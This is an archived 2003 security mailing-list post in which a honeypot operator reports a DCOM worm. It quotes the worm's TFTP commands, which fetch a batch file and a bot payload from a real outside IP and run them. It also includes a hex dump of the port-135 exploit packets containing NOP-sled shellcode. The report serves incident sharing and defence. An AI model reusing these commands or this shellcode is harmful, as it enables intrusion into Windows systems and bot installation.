DCOM worm with get.bat bot.rar

From: Andrej (laj_at_swordlord.com)
Date: 08/19/03

  • Next message: Thomas.Ray_at_tcud.state.tx.us: "RE: Software vendor clueless"
    To: incidents@securityfocus.com
    Date: Tue, 19 Aug 2003 11:05:57 +0200
    
    

    I just got a new DCOM worm on our honeypot. After the exploit on port 135
    (dump below) a connection was built on port 4444:
     TFTP -i 81.103.7.66 GET get.bat
     get.bat
     exit
    I was able to get the get.bat it's:
     mkdir C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
     cd C:\RECYCLER\S-1-5-21-57989841-1715567821-725345543-1004\
     TFTP -i 81.103.7.66 GET bot.rar
     TFTP -i 81.103.7.66 GET unrar.bat
     TFTP -i 81.103.7.66 GET unrar.exe
     start unrar.bat
     exit
    unfortunately I was not able to download the bot.rar for inspection because
    the connection timed out. Maybe somebody else is more successful

    cheers
    andrej

     

    [2003-08-19 10:37:34]
    IPv4: 81.103.7.66 -> *
         hlen=5 TOS=0 dlen=1500 ID=48197 flags=0 offset=0 TTL=114
    chksum=43601
    TCP: port=1176 -> dport: 135 flags=***A**** seq=2683878707
         ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=61593
    Payload: length = 1460

    000 : 05 00 00 03 10 00 00 00 A8 06 00 00 E5 00 00 00 ................
    010 : 90 06 00 00 01 00 04 00 05 00 06 00 01 00 00 00 ................
    020 : 00 00 00 00 32 24 58 FD CC 45 64 49 B0 70 DD AE ....2$X..EdI.p..
    030 : 74 2C 96 D2 60 5E 0D 00 01 00 00 00 00 00 00 00 t,..`^..........
    040 : 70 5E 0D 00 02 00 00 00 7C 5E 0D 00 00 00 00 00 p^......|^......
    050 : 10 00 00 00 80 96 F1 F1 2A 4D CE 11 A6 6A 00 20 ........*M...j.
    060 : AF 6E 72 F4 0C 00 00 00 4D 41 52 42 01 00 00 00 .nr.....MARB....
    070 : 00 00 00 00 0D F0 AD BA 00 00 00 00 A8 F4 0B 00 ................
    080 : 20 06 00 00 20 06 00 00 4D 45 4F 57 04 00 00 00 ... ...MEOW....
    090 : A2 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 ...............F
    0a0 : 38 03 00 00 00 00 00 00 C0 00 00 00 00 00 00 46 8..............F
    0b0 : 00 00 00 00 F0 05 00 00 E8 05 00 00 00 00 00 00 ................
    0c0 : 01 10 08 00 CC CC CC CC C8 00 00 00 4D 45 4F 57 ............MEOW
    0d0 : E8 05 00 00 D8 00 00 00 00 00 00 00 02 00 00 00 ................
    0e0 : 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    0f0 : 00 00 00 00 C4 28 CD 00 64 29 CD 00 00 00 00 00 .....(..d)......
    100 : 07 00 00 00 B9 01 00 00 00 00 00 00 C0 00 00 00 ................
    110 : 00 00 00 46 AB 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    120 : 00 00 00 46 A5 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    130 : 00 00 00 46 A6 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    140 : 00 00 00 46 A4 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    150 : 00 00 00 46 AD 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    160 : 00 00 00 46 AA 01 00 00 00 00 00 00 C0 00 00 00 ...F............
    170 : 00 00 00 46 07 00 00 00 60 00 00 00 58 00 00 00 ...F....`...X...
    180 : 90 00 00 00 40 00 00 00 20 00 00 00 38 03 00 00 ....@... ...8...
    190 : 30 00 00 00 01 00 00 00 01 10 08 00 CC CC CC CC 0...............
    1a0 : 50 00 00 00 4F B6 88 20 FF FF FF FF 00 00 00 00 P...O.. ........
    1b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    1c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    1d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    1e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    1f0 : 00 00 00 00 00 00 00 00 01 10 08 00 CC CC CC CC ................
    200 : 48 00 00 00 07 00 66 00 06 09 02 00 00 00 00 00 H.....f.........
    210 : C0 00 00 00 00 00 00 46 10 00 00 00 00 00 00 00 .......F........
    220 : 00 00 00 00 01 00 00 00 00 00 00 00 78 19 0C 00 ............x...
    230 : 58 00 00 00 05 00 06 00 01 00 00 00 70 D8 98 93 X...........p...
    240 : 98 4F D2 11 A9 3D BE 57 B2 00 00 00 32 00 31 00 .O...=.W....2.1.
    250 : 01 10 08 00 CC CC CC CC 80 00 00 00 0D F0 AD BA ................
    260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    270 : 18 43 14 00 00 00 00 00 60 00 00 00 60 00 00 00 .C......`...`...
    280 : 4D 45 4F 57 04 00 00 00 C0 01 00 00 00 00 00 00 MEOW............
    290 : C0 00 00 00 00 00 00 46 3B 03 00 00 00 00 00 00 .......F;.......
    2a0 : C0 00 00 00 00 00 00 46 00 00 00 00 30 00 00 00 .......F....0...
    2b0 : 01 00 01 00 81 C5 17 03 80 0E E9 4A 99 99 F1 8A ...........J....
    2c0 : 50 6F 7A 85 02 00 00 00 00 00 00 00 00 00 00 00 Poz.............
    2d0 : 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 ................
    2e0 : 01 10 08 00 CC CC CC CC 30 00 00 00 78 00 6E 00 ........0...x.n.
    2f0 : 00 00 00 00 D8 DA 0D 00 00 00 00 00 00 00 00 00 ................
    300 : 20 2F 0C 00 00 00 00 00 00 00 00 00 03 00 00 00 /..............
    310 : 00 00 00 00 03 00 00 00 46 00 58 00 00 00 00 00 ........F.X.....
    320 : 01 10 08 00 CC CC CC CC 10 00 00 00 30 00 2E 00 ............0...
    330 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    340 : 01 10 08 00 CC CC CC CC 68 00 00 00 0E 00 FF FF ........h.......
    350 : 68 8B 0B 00 02 00 00 00 00 00 00 00 00 00 00 00 h...............
    360 : 86 01 00 00 00 00 00 00 86 01 00 00 5C 00 5C 00 ............\.\.
    370 : 46 00 58 00 4E 00 42 00 46 00 58 00 46 00 58 00 F.X.N.B.F.X.F.X.
    380 : 4E 00 42 00 46 00 58 00 46 00 58 00 46 00 58 00 N.B.F.X.F.X.F.X.
    390 : 46 00 58 00 9D 13 00 01 CC E0 FD 7F CC E0 FD 7F F.X...........
    3a0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    3b0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    3c0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    3d0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    3e0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    3f0 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    400 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    410 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    420 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    430 : 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................
    440 : 90 90 90 90 90 90 90 EB 19 5E 31 C9 81 E9 89 FF .........^1.....
    450 : FF FF 81 36 80 BF 32 94 81 EE FC FF FF FF E2 F2 ...6..2.........
    460 : EB 05 E8 E2 FF FF FF 03 53 06 1F 74 57 75 95 80 ........S..tWu..
    470 : BF BB 92 7F 89 5A 1A CE B1 DE 7C E1 BE 32 94 09 ....Z....|..2..
    480 : F9 3A 6B B6 D7 9F 4D 85 71 DA C6 81 BF 32 1D C6 .:k...M.q....2..
    490 : B3 5A F8 EC BF 32 FC B3 8D 1C F0 E8 C8 41 A6 DF .Z...2.......A..
    4a0 : EB CD C2 88 36 74 90 7F 89 5A E6 7E 0C 24 7C AD ....6t..Z.~.$|.
    4b0 : BE 32 94 09 F9 22 6B B6 D7 4C 4C 62 CC DA 8A 81 .2..."k..LLb....
    4c0 : BF 32 1D C6 AB CD E2 84 D7 F9 79 7C 84 DA 9A 81 .2........y|....
    4d0 : BF 32 1D C6 A7 CD E2 84 D7 EB 9D 75 12 DA 6A 80 .2.........u..j.
    4e0 : BF 32 1D C6 A3 CD E2 84 D7 96 8E F0 78 DA 7A 80 .2..........x.z.
    4f0 : BF 32 1D C6 9F CD E2 84 D7 96 39 AE 56 DA 4A 80 .2........9.V.J.
    500 : BF 32 1D C6 9B CD E2 84 D7 D7 DD 06 F6 DA 5A 80 .2............Z.
    510 : BF 32 1D C6 97 CD E2 84 D7 D5 ED 46 C6 DA 2A 80 .2.........F..*.
    520 : BF 32 1D C6 93 01 6B 01 53 A2 95 80 BF 66 FC 81 .2....k.S....f..
    530 : BE 32 94 7F E9 2A C4 D0 EF 62 D4 D0 FF 62 6B D6 .2..*...b...bk.
    540 : A3 B9 4C D7 E8 5A 96 80 AE 6E 1F 4C D5 24 C5 D3 ..L..Z...n.L.$..
    550 : 40 64 B4 D7 EC CD C2 A4 E8 63 C7 7F E9 1A 1F 50 @d.......c....P
    560 : D7 57 EC E5 BF 5A F7 ED DB 1C 1D E6 8F B1 78 D4 .W...Z........x.
    570 : 32 0E B0 B3 7F 01 5D 03 7E 27 3F 62 42 F4 D0 A4 2....].~'?bB...
    580 : AF 76 6A C4 9B 0F 1D D4 9B 7A 1D D4 9B 7E 1D D4 .vj......z...~..
    590 : 9B 62 19 C4 9B 22 C0 D0 EE 63 C5 EA BE 63 C5 7F .b..."...c...c.
    5a0 : C9 02 C5 7F E9 22 1F 4C D5 CD 6B B1 40 64 98 0B ....".L..k.@d..
    5b0 : 77 65 6B D6 wek.

    [2003-08-19 10:37:34]
    IPv4: 81.103.7.66 -> *
         hlen=5 TOS=0 dlen=284 ID=48198 flags=0 offset=0 TTL=114
    chksum=44816
    TCP: port=1176 -> dport: 135 flags=***AP*** seq=2683880167
         ack=1434085177 off=5 res=0 win=64240 urp=0 chksum=21751
    Payload: length = 244

    000 : 93 CD C2 94 EA 64 F0 21 8F 32 94 80 3A F2 EC 8C .....d.!.2..:...
    010 : 34 72 98 0B CF 2E 39 0B D7 3A 7F 89 34 72 A0 0B 4r....9..:.4r..
    020 : 17 8A 94 80 BF B9 51 DE E2 F0 90 80 EC 67 C2 D7 ......Q......g..
    030 : 34 5E B0 98 34 77 A8 0B EB 37 EC 83 6A B9 DE 98 4^..4w...7..j...
    040 : 34 68 B4 83 62 D1 A6 C9 34 06 1F 83 4A 01 6B 7C 4h..b...4...J.k|
    050 : 8C F2 38 BA 7B 46 93 41 70 3F 97 78 54 C0 AF FC ..8.{F.Ap?.xT...
    060 : 9B 26 E1 61 34 68 B0 83 62 54 1F 8C F4 B9 CE 9C .&.a4h..bT......
    070 : BC EF 1F 84 34 31 51 6B BD 01 54 0B 6A 6D CA DD ....41Qk..T.jm..
    080 : E4 F0 90 80 2F A2 04 00 5C 00 43 00 24 00 5C 00 ..../...\.C.$.\.
    090 : 31 00 32 00 33 00 34 00 35 00 36 00 31 00 31 00 1.2.3.4.5.6.1.1.
    0a0 : 31 00 31 00 31 00 31 00 31 00 31 00 31 00 31 00 1.1.1.1.1.1.1.1.
    0b0 : 31 00 31 00 31 00 31 00 31 00 2E 00 64 00 6F 00 1.1.1.1.1...d.o.
    0c0 : 63 00 00 00 01 10 08 00 CC CC CC CC 20 00 00 00 c........... ...
    0d0 : 30 00 2D 00 00 00 00 00 88 2A 0C 00 02 00 00 00 0.-......*......
    0e0 : 01 00 00 00 28 8C 0C 00 01 00 00 00 07 00 00 00 ....(...........
    0f0 : 00 00 00 00 ....

    ---------------------------------------------------------------------------
    Captus Networks - Integrated Intrusion Prevention and Traffic Shaping
     - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans
     - Automatically Control P2P, IM and Spam Traffic
     - Ensure Reliable Performance of Mission Critical Applications
     - Precisely Define and Implement Network Security and Performance Policies
    **FREE Vulnerability Assessment Toolkit - WhitePapers - Live Demo
    Visit us at:
    http://www.securityfocus.com/sponsor/CaptusNetworks_incidents_030814
    ----------------------------------------------------------------------------


  • Next message: Thomas.Ray_at_tcud.state.tx.us: "RE: Software vendor clueless"

    Relevant Pages

    • SUMMARY: trying to start in.tftpd ( tftp ) and PXE-E11 ARP Time out
      ... The service doesn't start until a connection is made. ... I ps -ef|grep tftp and I get nothing. ... To activate a new entry in inetd.conf, ... Then from another host telnet to the tftpd port ...
      (SunManagers)
    • Re: [Full-Disclosure] W32/Welchia, W32/Nachi backdoor?
      ... > Telnetting to this port seems to disconnected after 1-5 characters have been ... > tftp client doesn't seem to offer any means of specifying a port to connect ... The client to infect opens the connection with the stdin/-out of CMD.EXE ...
      (Full-Disclosure)
    • tftp and tcp_wrappers
      ... We are implementing a tftp server to ... To assist in securing this server we are using ... When inetd accepts a connection on port ... connections that have queued) that spawned the connection. ...
      (SunManagers)
    • Re: Services & Firewall port settings
      ... > Because this definition of port numbers allowed I/O is a basic security ... Pretty much all of the Windows ... that file that causes some insecurity is the line about tftp. ... I would use a third party firewall instead, ...
      (microsoft.public.security)
    • Re: Downloading nk.bin to Target device without PB?
      ... Anyone you like that can be set to port 980. ... because that's the filename the bootloader tftp server expects to be ... should use a tftp client on the host. ... download use a slightly modified TFTP protocol (it uses port 980 rather ...
      (microsoft.public.windowsce.platbuilder)